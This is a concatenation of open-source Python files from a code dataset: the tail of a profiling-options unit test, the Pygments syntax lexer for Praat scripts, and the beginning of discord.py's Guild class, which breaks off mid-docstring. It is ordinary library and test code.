are stored in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000
files).
"""
def testAddArguments(self):
"""Tests the AddArguments function."""
argument_parser = argparse.ArgumentParser(
prog='cli_helper.py', description='Test argument parser.',
add_help=False,
formatter_class=cli_test_lib.SortedArgumentsHelpFormatter)
profiling.ProfilingArgumentsHelper.AddArguments(argument_parser)
output = self._RunArgparseFormatHelp(argument_parser)
self.assertEqual(output, self._EXPECTED_OUTPUT)
def testParseOptions(self):
"""Tests the ParseOptions function."""
# pylint: disable=no-member
test_tool = tools.CLITool()
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = '100'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profiling_sample_rate, 100)
with shared_test_lib.TempDirectory() as temp_directory:
options = cli_test_lib.TestOptions()
options.profilers = 'processing'
options.profiling_directory = temp_directory
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profilers, set(['processing']))
self.assertEqual(test_tool._profiling_directory, temp_directory)
self.assertEqual(test_tool._profiling_sample_rate, 1000)
with self.assertRaises(errors.BadConfigObject):
options = cli_test_lib.TestOptions()
profiling.ProfilingArgumentsHelper.ParseOptions(options, None)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profilers = 'bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_directory = '/bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 'a'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 100
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3743 | # -*- coding: utf-8 -*-
"""
pygments.lexers.praat
~~~~~~~~~~~~~~~~~~~~~
Lexer for Praat
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, words, bygroups, include
from pygments.token import Name, Text, Comment, Keyword, String, Punctuation, Number, \
Operator
__all__ = ['PraatLexer']
class PraatLexer(RegexLexer):
"""
For `Praat <http://www.praat.org>`_ scripts.
.. versionadded:: 2.1
"""
name = 'Praat'
aliases = ['praat']
filenames = ['*.praat', '*.proc', '*.psc']
keywords = (
'if', 'then', 'else', 'elsif', 'elif', 'endif', 'fi', 'for', 'from', 'to',
'endfor', 'endproc', 'while', 'endwhile', 'repeat', 'until', 'select', 'plus',
'minus', 'demo', 'assert', 'stopwatch', 'nocheck', 'nowarn', 'noprogress',
'editor', 'endeditor', 'clearinfo',
)
functions_string = (
'backslashTrigraphsToUnicode', 'chooseDirectory', 'chooseReadFile',
'chooseWriteFile', 'date', 'demoKey', 'do', 'environment', 'extractLine',
'extractWord', 'fixed', 'info', 'left', 'mid', 'percent', 'readFile', 'replace',
'replace_regex', 'right', 'selected', 'string', 'unicodeToBackslashTrigraphs',
)
functions_numeric = (
'abs', 'appendFile', 'appendFileLine', 'appendInfo', 'appendInfoLine', 'arccos',
'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctan2', 'arctanh', 'barkToHertz',
'beginPause', 'beginSendPraat', 'besselI', 'besselK', 'beta', 'beta2',
'binomialP', 'binomialQ', 'boolean', 'ceiling', 'chiSquareP', 'chiSquareQ',
'choice', 'comment', 'cos', 'cosh', 'createDirectory', 'deleteFile',
'demoClicked', 'demoClickedIn', 'demoCommandKeyPressed',
'demoExtraControlKeyPressed', 'demoInput', 'demoKeyPressed',
'demoOptionKeyPressed', 'demoShiftKeyPressed', 'demoShow', 'demoWaitForInput',
'demoWindowTitle', 'demoX', 'demoY', 'differenceLimensToPhon', 'do', 'editor',
'endPause', 'endSendPraat', 'endsWith', 'erb', 'erbToHertz', 'erf', 'erfc',
'exitScript', 'exp', 'extractNumber', 'fileReadable', 'fisherP', 'fisherQ',
'floor', 'gaussP', 'gaussQ', 'hertzToBark', 'hertzToErb', 'hertzToMel',
'hertzToSemitones', 'imax', 'imin', 'incompleteBeta', 'incompleteGammaP', 'index',
'index_regex', 'invBinomialP', 'invBinomialQ', 'invChiSquareQ', 'invFisherQ',
'invGaussQ', 'invSigmoid', 'invStudentQ', 'length', 'ln', 'lnBeta', 'lnGamma',
'log10', 'log2', 'max', 'melToHertz', 'min', 'minusObject', 'natural', 'number',
'numberOfColumns', 'numberOfRows', 'numberOfSelected', 'objectsAreIdentical',
'option', 'optionMenu', 'pauseScript', 'phonToDifferenceLimens', 'plusObject',
'positive', 'randomBinomial', 'randomGauss', 'randomInteger', 'randomPoisson',
'randomUniform', 'real', 'readFile', 'removeObject', 'rindex', 'rindex_regex',
'round', 'runScript', 'runSystem', 'runSystem_nocheck', 'selectObject',
'selected', 'semitonesToHertz', 'sentencetext', 'sigmoid', 'sin', 'sinc',
'sincpi', 'sinh', 'soundPressureToPhon', 'sqrt', 'startsWith', 'studentP',
'studentQ', 'tan', 'tanh', 'variableExists', 'word', 'writeFile', 'writeFileLine',
'writeInfo', 'writeInfoLine',
)
functions_array = (
'linear', 'randomGauss', 'randomInteger', 'randomUniform', 'zero',
)
objects = (
'Activation', 'AffineTransform', 'AmplitudeTier', 'Art', 'Artword',
'Autosegment', 'BarkFilter', 'BarkSpectrogram', 'CCA', 'Categories',
'Cepstrogram', 'Cepstrum', 'Cepstrumc', 'ChebyshevSeries', 'ClassificationTable',
'Cochleagram', 'Collection', 'ComplexSpectrogram', 'Configuration', 'Confusion',
'ContingencyTable', 'Corpus', 'Correlation', 'Covariance',
'CrossCorrelationTable', 'CrossCorrelationTables', 'DTW', 'DataModeler',
'Diagonalizer', 'Discriminant', 'Dissimilarity', 'Distance', 'Distributions',
'DurationTier', 'EEG', 'ERP', 'ERPTier', 'EditCostsTable', 'EditDistanceTable',
'Eigen', 'Excitation', 'Excitations', 'ExperimentMFC', 'FFNet', 'FeatureWeights',
'FileInMemory', 'FilesInMemory', 'Formant', 'FormantFilter', 'FormantGrid',
'FormantModeler', 'FormantPoint', 'FormantTier', 'GaussianMixture', 'HMM',
'HMM_Observation', 'HMM_ObservationSequence', 'HMM_State', 'HMM_StateSequence',
'Harmonicity', 'ISpline', 'Index', 'Intensity', 'IntensityTier', 'IntervalTier',
'KNN', 'KlattGrid', 'KlattTable', 'LFCC', 'LPC', 'Label', 'LegendreSeries',
'LinearRegression', 'LogisticRegression', 'LongSound', 'Ltas', 'MFCC', 'MSpline',
'ManPages', 'Manipulation', 'Matrix', 'MelFilter', 'MelSpectrogram',
'MixingMatrix', 'Movie', 'Network', 'OTGrammar', 'OTHistory', 'OTMulti', 'PCA',
'PairDistribution', 'ParamCurve', 'Pattern', 'Permutation', 'Photo', 'Pitch',
'PitchModeler', 'PitchTier', 'PointProcess', 'Polygon', 'Polynomial',
'PowerCepstrogram', 'PowerCepstrum', 'Procrustes', 'RealPoint', 'RealTier',
'ResultsMFC', 'Roots', 'SPINET', 'SSCP', 'SVD', 'Salience', 'ScalarProduct',
'Similarity', 'SimpleString', 'SortedSetOfString', 'Sound', 'Speaker',
'Spectrogram', 'Spectrum', 'SpectrumTier', 'SpeechSynthesizer', 'SpellingChecker',
'Strings', 'StringsIndex', 'Table', 'TableOfReal', 'TextGrid', 'TextInterval',
'TextPoint', 'TextTier', 'Tier', 'Transition', 'VocalTract', 'VocalTractTier',
'Weight', 'WordList',
)
variables_numeric = (
'macintosh', 'windows', 'unix', 'praatVersion', 'pi', 'e', 'undefined',
)
variables_string = (
'praatVersion', 'tab', 'shellDirectory', 'homeDirectory',
'preferencesDirectory', 'newline', 'temporaryDirectory',
'defaultDirectory',
)
tokens = {
'root': [
(r'(\s+)(#.*?$)', bygroups(Text, Comment.Single)),
(r'^#.*?$', Comment.Single),
(r';[^\n]*', Comment.Single),
(r'\s+', Text),
(r'\bprocedure\b', Keyword, 'procedure_definition'),
(r'\bcall\b', Keyword, 'procedure_call'),
(r'@', Name.Function, 'procedure_call'),
include('function_call'),
(words(keywords, suffix=r'\b'), Keyword),
(r'(\bform\b)(\s+)([^\n]+)',
bygroups(Keyword, Text, String), 'old_form'),
(r'(print(?:line|tab)?|echo|exit|asserterror|pause|send(?:praat|socket)|'
r'include|execute|system(?:_nocheck)?)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(goto|label)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
include('variable_name'),
include('number'),
(r'"', String, 'string'),
(words((objects), suffix=r'(?=\s+\S+\n)'), Name.Class, 'string_unquoted'),
(r'\b[A-Z]', Keyword, 'command'),
(r'(\.{3}|[)(,])', Punctuation),
],
'command': [
(r'( ?[\w()-]+ ?)', Keyword),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r'\.{3}', Keyword, ('#pop', 'old_arguments')),
(r':', Keyword, ('#pop', 'comma_list')),
(r'\s', Text, '#pop'),
],
'procedure_call': [
(r'\s+', Text),
(r'([\w.]+)(:|\s*\()',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)', Name.Function, ('#pop', 'old_arguments')),
],
'procedure_definition': [
(r'\s', Text),
(r'([\w.]+)(\s*?[(:])',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)([^\n]*)',
bygroups(Name.Function, Text), '#pop'),
],
'function_call': [
(words(functions_string, suffix=r'\$(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_array, suffix=r'#(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_numeric, suffix=r'(?=\s*[:(])'), Name.Function, 'function'),
],
'function': [
(r'\s+', Text),
(r':', Punctuation, ('#pop', 'comma_list')),
(r'\s*\(', Punctuation, ('#pop', 'comma_list')),
],
'comma_list': [
(r'(\s*\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'(\s*[])\n])', Text, '#pop'),
(r'\s+', Text),
(r'"', String, 'string'),
(r'\b(if|then|else|fi|endif)\b', Keyword),
include('function_call'),
include('variable_name'),
include('operator'),
include('number'),
(r'[()]', Text),
(r',', Punctuation),
],
'old_arguments': [
(r'\n', Text, '#pop'),
include('variable_name'),
include('operator'),
include('number'),
(r'"', String, 'string'),
(r'[^\n]', Text),
],
'number': [
(r'\n', Text, '#pop'),
(r'\b\d+(\.\d*)?([eE][-+]?\d+)?%?', Number),
],
'object_attributes': [
(r'\.?(n(col|row)|[xy]min|[xy]max|[nd][xy])\b', Name.Builtin, '#pop'),
(r'(\.?(?:col|row)\$)(\[)',
bygroups(Name.Builtin, Text), 'variable_name'),
(r'(\$?)(\[)',
bygroups(Name.Builtin, Text), ('#pop', 'comma_list')),
],
'variable_name': [
include('operator'),
include('number'),
(words(variables_string, suffix=r'\$'), Name.Variable.Global),
(words(variables_numeric, suffix=r'\b'), Name.Variable.Global),
(r'\bObject_\w+', Name.Builtin, 'object_attributes'),
(words(objects, prefix=r'\b', suffix=r'_\w+'),
Name.Builtin, 'object_attributes'),
(r"\b(Object_)(')",
bygroups(Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(words(objects, prefix=r'\b', suffix=r"(_)(')"),
bygroups(Name.Builtin, Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(r'\.?_?[a-z][\w.]*(\$|#)?', Text),
(r'[\[\]]', Punctuation, 'comma_list'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
],
'operator': [
(r'([+\/*<>=!-]=?|[&*|][&*|]?|\^|<>)', Operator),
(r'(?<![\w.])(and|or|not|div|mod)(?![\w.])', Operator.Word),
],
'string_interpolated': [
(r'\.?[_a-z][\w.]*[$#]?(?:\[[a-zA-Z0-9,]+\])?(:[0-9]+)?',
String.Interpol),
(r"'", String.Interpol, '#pop'),
],
'string_unquoted': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'\n', Text, '#pop'),
(r'\s', Text),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r"[^'\n]+", String),
],
'string': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'"', String, '#pop'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r'[^\'"\n]+', String),
],
'old_form': [
(r'\s+', Text),
(r'(optionmenu|choice)([ \t]+\S+:[ \t]+)',
bygroups(Keyword, Text), 'number'),
(r'(option|button)([ \t]+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(sentence|text)([ \t]+\S+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(word)([ \t]+\S+[ \t]*)(\S+)?([ \t]+.*)?',
bygroups(Keyword, Text, String, Text)),
(r'(boolean)(\s+\S+\s*)(0|1|"?(?:yes|no)"?)',
bygroups(Keyword, Text, Name.Variable)),
# Ideally processing of the number would happend in the 'number'
# but that doesn't seem to work
(r'(real|natural|positive|integer)([ \t]+\S+[ \t]*)([+-]?)(\d+(?:\.\d*)?'
r'(?:[eE][-+]?\d+)?%?)',
bygroups(Keyword, Text, Operator, Number)),
(r'(comment)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'\bendform\b', Keyword, '#pop'),
]
}
|
the-stack_0_3745 | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
from collections import namedtuple
from typing import List, TYPE_CHECKING
from . import utils, abc
from .role import Role
from .member import Member, VoiceState
from .emoji import Emoji
from .errors import InvalidData
from .permissions import PermissionOverwrite
from .colour import Colour
from .errors import InvalidArgument, ClientException
from .channel import *
from .enums import VoiceRegion, ChannelType, try_enum, VerificationLevel, ContentFilter, NotificationLevel
from .mixins import Hashable
from .user import User
from .invite import Invite
from .iterators import AuditLogIterator, MemberIterator
from .widget import Widget
from .asset import Asset
from .flags import SystemChannelFlags
from .integrations import Integration
__all__ = (
'Guild',
)
if TYPE_CHECKING:
from .types.guild import (
Ban as BanPayload
)
BanEntry = namedtuple('BanEntry', 'reason user')
_GuildLimit = namedtuple('_GuildLimit', 'emoji bitrate filesize')
class Guild(Hashable):
"""Represents a Discord guild.
This is referred to as a "server" in the official Discord UI.
.. container:: operations
.. describe:: x == y
Checks if two guilds are equal.
.. describe:: x != y
Checks if two guilds are not equal.
.. describe:: hash(x)
Returns the guild's hash.
.. describe:: str(x)
Returns the guild's name.
Attributes
----------
name: :class:`str`
The guild name.
emojis: Tuple[:class:`Emoji`, ...]
All emojis that the guild owns.
region: :class:`VoiceRegion`
The region the guild belongs on. There is a chance that the region
will be a :class:`str` if the value is not recognised by the enumerator.
afk_timeout: :class:`int`
The timeout to get sent to the AFK channel.
afk_channel: Optional[:class:`VoiceChannel`]
The channel that denotes the AFK channel. ``None`` if it doesn't exist.
icon: Optional[:class:`str`]
The guild's icon.
id: :class:`int`
The guild's ID.
owner_id: :class:`int`
The guild owner's ID. Use :attr:`Guild.owner` instead.
unavailable: :class:`bool`
Indicates if the guild is unavailable. If this is ``True`` then the
reliability of other attributes outside of :meth:`Guild.id` is slim and they might
all be ``None``. It is best to not do anything with the guild if it is unavailable.
Check the :func:`on_guild_unavailable` and :func:`on_guild_available` events.
max_presences: Optional[:class:`int`]
The maximum amount of presences for the guild.
max_members: Optional[:class:`int`]
The maximum amount of members for the guild.
.. note::
This attribute is only available via :meth:`.Client.fetch_guild`.
max_video_channel_users: Optional[:class:`int`]
The maximum amount of users in a video channel.
.. versionadded:: 1.4
banner: Optional[:class:`str`]
The guild's banner.
description: Optional[:class:`str`]
The guild's description.
mfa_level: :class:`int`
Indicates the guild's two factor authorisation level. If this value is 0 then
the guild does not require 2FA for their administrative members. If the value is
1 then they do.
verification_level: :class:`VerificationLevel`
The guild's verification level.
explicit_content_filter: :class:`ContentFilter`
The guild's explicit content filter.
default_notifications: :class:`NotificationLevel`
The guild's notification settings.
features: List[:class:`str`]
A list of features that the guild has. They are currently as follows:
- ``VIP_REGIONS``: Guild has VIP voice regions
- ``VANITY_URL``: Guild can have a vanity invite URL (e.g. discord.gg/discord-api)
- ``INVITE_SPLASH``: Guild's invite page can have a special splash.
- ``VERIFIED``: Guild is a verified server.
- ``PARTNERED``: Guild is a partnered server.
- ``MORE_EMOJI``: Guild is allowed to have more than 50 custom emoji.
- ``DISCOVERABLE``: Guild shows up in Server Discovery.
- ``FEATURABLE``: Guild is able to be featured in Server Discovery.
- ``COMMUNITY``: Guild is a community server.
- ``COMMERCE``: Guild can sell things using store channels.
- ``PUBLIC``: Guild is a public guild.
- ``NEWS``: Guild can create news channels.
- ``BANNER``: Guild can upload and use a banner (i.e. :meth:`banner_url`).
- ``ANIMATED_ICON``: Guild can upload an animated icon.
- ``PUBLIC_DISABLED``: Guild cannot be public.
- ``WELCOME_SCREEN_ENABLED``: Guild has enabled the welcome screen
- ``MEMBER_VERIFICATION_GATE_ENABLED``: Guild has Membership Screening enabled.
- ``PREVIEW_ENABLED``: Guild can be viewed before being accepted via Membership Screening.
splash: Optional[:class:`str`]
The guild's invite splash.
premium_tier: :class:`int`
The premium tier for this guild. Corresponds to "Nitro Server" in the official UI.
The number goes from 0 to 3 inclusive.
premium_subscription_count: :class:`int`
The number of "boosts" this guild currently has.
preferred_locale: Optional[:class:`str`]
The preferred locale for the guild. Used when filtering Server Discovery
results to a specific language.
discovery_splash: :class:`str`
The guild's discovery splash.
.. versionadded:: 1.3
"""
__slots__ = ('afk_timeout', 'afk_channel', '_members', '_channels', 'icon',
'name', 'id', 'unavailable', 'banner', 'region', '_state',
'_roles', '_member_count', '_large',
'owner_id', 'mfa_level', 'emojis', 'features',
'verification_level', 'explicit_content_filter', 'splash',
'_voice_states', '_system_channel_id', 'default_notifications',
'description', 'max_presences', 'max_members', 'max_video_channel_users',
'premium_tier', 'premium_subscription_count', '_system_channel_flags',
'preferred_locale', 'discovery_splash', '_rules_channel_id',
'_public_updates_channel_id')
_PREMIUM_GUILD_LIMITS = {
None: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
0: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
1: _GuildLimit(emoji=100, bitrate=128e3, filesize=8388608),
2: _GuildLimit(emoji=150, bitrate=256e3, filesize=52428800),
3: _GuildLimit(emoji=250, bitrate=384e3, filesize=104857600),
}
def __init__(self, *, data, state):
self._channels = {}
self._members = {}
self._voice_states = {}
self._state = state
self._from_data(data)
def _add_channel(self, channel):
self._channels[channel.id] = channel
def _remove_channel(self, channel):
self._channels.pop(channel.id, None)
def _voice_state_for(self, user_id):
return self._voice_states.get(user_id)
def _add_member(self, member):
self._members[member.id] = member
def _remove_member(self, member):
self._members.pop(member.id, None)
def __str__(self):
return self.name or ''
def __repr__(self):
attrs = (
('id', self.id),
('name', self.name),
('shard_id', self.shard_id),
('chunked', self.chunked),
('member_count', getattr(self, '_member_count', None)),
)
inner = ' '.join('%s=%r' % t for t in attrs)
return f'<Guild {inner}>'
def _update_voice_state(self, data, channel_id):
user_id = int(data['user_id'])
channel = self.get_channel(channel_id)
try:
# check if we should remove the voice state from cache
if channel is None:
after = self._voice_states.pop(user_id)
else:
after = self._voice_states[user_id]
before = copy.copy(after)
after._update(data, channel)
except KeyError:
# if we're here then we're getting added into the cache
after = VoiceState(data=data, channel=channel)
before = VoiceState(data=data, channel=None)
self._voice_states[user_id] = after
member = self.get_member(user_id)
if member is None:
try:
member = Member(data=data['member'], state=self._state, guild=self)
except KeyError:
member = None
return member, before, after
def _add_role(self, role):
# roles get added to the bottom (position 1, pos 0 is @everyone)
# so since self.roles has the @everyone role, we can't increment
# its position because it's stuck at position 0. Luckily x += False
# is equivalent to adding 0. So we cast the position to a bool and
# increment it.
for r in self._roles.values():
r.position += (not r.is_default())
self._roles[role.id] = role
def _remove_role(self, role_id):
# this raises KeyError if it fails..
role = self._roles.pop(role_id)
# since it didn't, we can change the positions now
# basically the same as above except we only decrement
# the position if we're above the role we deleted.
for r in self._roles.values():
r.position -= r.position > role.position
return role
def _from_data(self, guild):
# according to Stan, this is always available even if the guild is unavailable
# I don't have this guarantee when someone updates the guild.
member_count = guild.get('member_count', None)
if member_count is not None:
self._member_count = member_count
self.name = guild.get('name')
self.region = try_enum(VoiceRegion, guild.get('region'))
self.verification_level = try_enum(VerificationLevel, guild.get('verification_level'))
self.default_notifications = try_enum(NotificationLevel, guild.get('default_message_notifications'))
self.explicit_content_filter = try_enum(ContentFilter, guild.get('explicit_content_filter', 0))
self.afk_timeout = guild.get('afk_timeout')
self.icon = guild.get('icon')
self.banner = guild.get('banner')
self.unavailable = guild.get('unavailable', False)
self.id = int(guild['id'])
self._roles = {}
state = self._state # speed up attribute access
for r in guild.get('roles', []):
role = Role(guild=self, data=r, state=state)
self._roles[role.id] = role
self.mfa_level = guild.get('mfa_level')
self.emojis = tuple(map(lambda d: state.store_emoji(self, d), guild.get('emojis', [])))
self.features = guild.get('features', [])
self.splash = guild.get('splash')
self._system_channel_id = utils._get_as_snowflake(guild, 'system_channel_id')
self.description = guild.get('description')
self.max_presences = guild.get('max_presences')
self.max_members = guild.get('max_members')
self.max_video_channel_users = guild.get('max_video_channel_users')
self.premium_tier = guild.get('premium_tier', 0)
self.premium_subscription_count = guild.get('premium_subscription_count') or 0
self._system_channel_flags = guild.get('system_channel_flags', 0)
self.preferred_locale = guild.get('preferred_locale')
self.discovery_splash = guild.get('discovery_splash')
self._rules_channel_id = utils._get_as_snowflake(guild, 'rules_channel_id')
self._public_updates_channel_id = utils._get_as_snowflake(guild, 'public_updates_channel_id')
cache_joined = self._state.member_cache_flags.joined
self_id = self._state.self_id
for mdata in guild.get('members', []):
member = Member(data=mdata, guild=self, state=state)
if cache_joined or member.id == self_id:
self._add_member(member)
self._sync(guild)
self._large = None if member_count is None else self._member_count >= 250
self.owner_id = utils._get_as_snowflake(guild, 'owner_id')
self.afk_channel = self.get_channel(utils._get_as_snowflake(guild, 'afk_channel_id'))
for obj in guild.get('voice_states', []):
self._update_voice_state(obj, int(obj['channel_id']))
def _sync(self, data):
try:
self._large = data['large']
except KeyError:
pass
empty_tuple = tuple()
for presence in data.get('presences', []):
user_id = int(presence['user']['id'])
member = self.get_member(user_id)
if member is not None:
member._presence_update(presence, empty_tuple)
if 'channels' in data:
channels = data['channels']
for c in channels:
factory, ch_type = _channel_factory(c['type'])
if factory:
self._add_channel(factory(guild=self, data=c, state=self._state))
@property
def channels(self):
"""List[:class:`abc.GuildChannel`]: A list of channels that belongs to this guild."""
return list(self._channels.values())
@property
def large(self):
""":class:`bool`: Indicates if the guild is a 'large' guild.
A large guild is defined as having more than ``large_threshold`` count
members, which for this library is set to the maximum of 250.
"""
if self._large is None:
try:
return self._member_count >= 250
except AttributeError:
return len(self._members) >= 250
return self._large
@property
def voice_channels(self):
"""List[:class:`VoiceChannel`]: A list of voice channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, VoiceChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def stage_channels(self):
"""List[:class:`StageChannel`]: A list of voice channels that belongs to this guild.
.. versionadded:: 1.7
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, StageChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def me(self):
""":class:`Member`: Similar to :attr:`Client.user` except an instance of :class:`Member`.
This is essentially used to get the member version of yourself.
"""
self_id = self._state.user.id
return self.get_member(self_id)
@property
def voice_client(self):
"""Optional[:class:`VoiceProtocol`]: Returns the :class:`VoiceProtocol` associated with this guild, if any."""
return self._state._get_voice_client(self.id)
@property
def text_channels(self):
"""List[:class:`TextChannel`]: A list of text channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, TextChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def categories(self):
"""List[:class:`CategoryChannel`]: A list of categories that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, CategoryChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
def by_category(self):
"""Returns every :class:`CategoryChannel` and their associated channels.
These channels and categories are sorted in the official Discord UI order.
If the channels do not have a category, then the first element of the tuple is
``None``.
Returns
--------
List[Tuple[Optional[:class:`CategoryChannel`], List[:class:`abc.GuildChannel`]]]:
The categories and their associated channels.
"""
grouped = {}
for channel in self._channels.values():
if isinstance(channel, CategoryChannel):
grouped.setdefault(channel.id, [])
continue
try:
grouped[channel.category_id].append(channel)
except KeyError:
grouped[channel.category_id] = [channel]
def key(t):
k, v = t
return ((k.position, k.id) if k else (-1, -1), v)
_get = self._channels.get
as_list = [(_get(k), v) for k, v in grouped.items()]
as_list.sort(key=key)
for _, channels in as_list:
channels.sort(key=lambda c: (c._sorting_bucket, c.position, c.id))
return as_list
def get_channel(self, channel_id):
"""Returns a channel with the given ID.
Parameters
-----------
channel_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`.abc.GuildChannel`]
The returned channel or ``None`` if not found.
"""
return self._channels.get(channel_id)
@property
def system_channel(self):
"""Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages.
If no channel is set, then this returns ``None``.
"""
channel_id = self._system_channel_id
return channel_id and self._channels.get(channel_id)
@property
def system_channel_flags(self):
""":class:`SystemChannelFlags`: Returns the guild's system channel settings."""
return SystemChannelFlags._from_value(self._system_channel_flags)
@property
def rules_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel used for the rules.
The guild must be a Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.3
"""
channel_id = self._rules_channel_id
return channel_id and self._channels.get(channel_id)
@property
def public_updates_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel where admins and
moderators of the guilds receive notices from Discord. The guild must be a
Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.4
"""
channel_id = self._public_updates_channel_id
return channel_id and self._channels.get(channel_id)
@property
def emoji_limit(self):
""":class:`int`: The maximum number of emoji slots this guild has."""
more_emoji = 200 if 'MORE_EMOJI' in self.features else 50
return max(more_emoji, self._PREMIUM_GUILD_LIMITS[self.premium_tier].emoji)
@property
def bitrate_limit(self):
""":class:`float`: The maximum bitrate for voice channels this guild can have."""
vip_guild = self._PREMIUM_GUILD_LIMITS[1].bitrate if 'VIP_REGIONS' in self.features else 96e3
return max(vip_guild, self._PREMIUM_GUILD_LIMITS[self.premium_tier].bitrate)
@property
def filesize_limit(self):
""":class:`int`: The maximum number of bytes files can have when uploaded to this guild."""
return self._PREMIUM_GUILD_LIMITS[self.premium_tier].filesize
@property
def members(self):
"""List[:class:`Member`]: A list of members that belong to this guild."""
return list(self._members.values())
def get_member(self, user_id):
"""Returns a member with the given ID.
Parameters
-----------
user_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Member`]
The member or ``None`` if not found.
"""
return self._members.get(user_id)
@property
def premium_subscribers(self):
"""List[:class:`Member`]: A list of members who have "boosted" this guild."""
return [member for member in self.members if member.premium_since is not None]
@property
def roles(self):
"""List[:class:`Role`]: Returns a :class:`list` of the guild's roles in hierarchy order.
The first element of this list will be the lowest role in the
hierarchy.
"""
return sorted(self._roles.values())
def get_role(self, role_id):
"""Returns a role with the given ID.
Parameters
-----------
role_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Role`]
The role or ``None`` if not found.
"""
return self._roles.get(role_id)
@property
def default_role(self):
""":class:`Role`: Gets the @everyone role that all members have by default."""
return self.get_role(self.id)
@property
def premium_subscriber_role(self):
"""Optional[:class:`Role`]: Gets the premium subscriber role, AKA "boost" role, in this guild.
.. versionadded:: 1.6
"""
for role in self._roles.values():
if role.is_premium_subscriber():
return role
return None
@property
def self_role(self):
"""Optional[:class:`Role`]: Gets the role associated with this client's user, if any.
.. versionadded:: 1.6
"""
self_id = self._state.self_id
for role in self._roles.values():
tags = role.tags
if tags and tags.bot_id == self_id:
return role
return None
@property
def owner(self):
"""Optional[:class:`Member`]: The member that owns the guild."""
return self.get_member(self.owner_id)
@property
def icon_url(self):
""":class:`Asset`: Returns the guild's icon asset."""
return self.icon_url_as()
def is_icon_animated(self):
""":class:`bool`: Returns True if the guild has an animated icon."""
return bool(self.icon and self.icon.startswith('a_'))
def icon_url_as(self, *, format=None, static_format='webp', size=1024):
"""Returns an :class:`Asset` for the guild's icon.
The format must be one of 'webp', 'jpeg', 'jpg', 'png' or 'gif', and
'gif' is only valid for animated avatars. The size must be a power of 2
between 16 and 4096.
Parameters
-----------
format: Optional[:class:`str`]
The format to attempt to convert the icon to.
